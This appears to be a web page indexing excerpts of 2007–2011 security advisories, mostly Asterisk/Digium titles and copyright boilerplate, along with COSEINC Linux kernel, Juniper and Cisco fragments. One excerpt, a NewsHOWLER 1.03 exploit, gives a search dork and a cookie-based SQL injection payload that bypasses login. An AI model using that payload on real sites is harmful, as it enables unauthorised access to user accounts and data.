
AST-2007-025 - SQL Injection issue in res_config_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-025
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-003: Unauthenticated calls allowed from SIP channel driver

   |------------------+---------------------+-------------------------------|
   | 2008-03-18       | Jason Parker        | Initial Release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-003
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-001: Information leak in IAX2 authentication

   |-----------------+------------------------+-----------------------------|
   | 2009-01-07      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-001
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



ASA-2007-019: Remote crash vulnerability in Skinny channel driver

   |--------------------+------------------------+--------------------------|
   | August 7, 2007     | jparker@digium.com     | Initial Release          |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - ASA-2007-019
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-011: Traffic amplification in IAX2 firmware provisioning system

   |-----------------+--------------------+---------------------------------|
   | July 22, 2008   | Tilghman Lesher    | Revised C.1 version numbers     |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-011
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



RE: XSS vulnerability in Cisco MeetingPlace

session; the version information is provided at the bottom of the
home page.  The following output shows an example of the text
viewable when accessing the home page of a MeetingPlace Web
Conferencing server running software version 5.3.447.4: 

Copyright C 1992-2007 Cisco Systems, Inc. All Rights Reserved. 
Version: 5.3.447.4

Workarounds
===========


AST-2007-023 - SQL Injection Vulnerability in cdr_addon_mysql

   |-----------------+-----------------------+------------------------------|
   | 2007-10-16      | Tilghman Lesher       | Added CVE number             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - 2007-AST-023
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-024 - Fallacious security advisory spread on the Internet involving buffer overflow in Zaptel's sethdlc application

    | 10/31/2007 | Mark Michelson | Changed severity, description, and       |
    |            |                | resolution                               |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-024
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.



Juniper Advisory

                Version: 6.2.0r1.0 (Firewall+VPN)

                ScreenOS WebUI
                Copyright © 1997-2008 Juniper Networks, Inc.
                All Rights Reserved.


                For the latest technical information visit:
                http://www.juniper.net


AST-2009-002: Remote Crash Vulnerability in SIP channel driver

   |------------------+--------------------+--------------------------------|
   | 2009-03-10       | Joshua Colp        | Initial release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-002
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                   #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                   #
#####################################################################################
#                                   [Exploit]                                       #
#                                                                                   #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

AST-2007-022: Buffer overflows in voicemail when using IMAP storage

    |--------------------+---------------------------+-----------------------|
    | October 9, 2007    | mmichelson@digium.com     | Initial Release       |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-022
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.



AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

   |------------------+--------------------+--------------------------------|
   | 2008-06-03       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-008
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-021: Crash from invalid/corrupted MIME bodies when using voicemail with IMAP storage

   |----------------------+---------------------+---------------------------|
   | August 24, 2007      | Mark Michelson      | Initial Release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-021
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2008 Wojciech Purczynski
Copyright (c) 2008 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.


AST-2011-013: Possible remote enumeration of SIP endpoints with differing NAT settings

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-013
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2011-007

   |-------------------+-------------------------+--------------------------|
   | 06/02/11          | Jonathan Rose           | Initial Release          |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2011-007
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.


AST-2010-003: Invalid parsing of ACL rules can compromise security

   |-------------------+----------------------+-----------------------------|
   | Feb 24, 2010      | Mark Michelson       | Initial Advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2010-003
              Copyright (c) 2010 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



COSEINC Linux Advisory #2: IA32 System Call Emulation Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.


AST-2008-007: Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | May 15, 2008      | Mark Michelson       | Initial advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-007
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-004: Format String Vulnerability in Logger and Manager

   |------------------+--------------------+--------------------------------|
   | 2008-03-18       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-004
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-006 - 3-way handshake in IAX2 incomplete

   |---------------------+----------------------+---------------------------|
   | April 22, 2008      | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-006
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-027 - Database matching order permits host-based authentication to be ignored

   |-----------------+------------------------+-----------------------------|
   | 2007-12-18      | Tilghman Lesher        | Initial Release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-027
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-020: Resource Exhaustion Vulnerability in Asterisk SIP channel driver

   |---------------------+------------------------+-------------------------|
   | August 21, 2007     | russell@digium.com     | Initial Release         |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-020
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2006,2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.


AST-2008-009: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | Jun 3, 2008       | Mark Michelson       | Initial draft               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-009
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2007-026 - SQL Injection issue in cdr_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-026
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2008-002: Two buffer overflows in RTP Codec Payload Handling

   |------------------+--------------------+--------------------------------|
   | 2008-03-18       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-002
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2009-010: RTP Remote Crash Vulnerability

   |------------------+---------------------+-------------------------------|
   | 2009-09-03       | David Vossel        | Initial release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-010
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.



AST-2011-005: File Descriptor Resource Exhaustion

                                Revision History
          Date                 Editor                  Revisions Made         
   04/21/11           Matthew Nicholson        Initial version                

               Asterisk Project Security Advisory - AST-2011-005
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
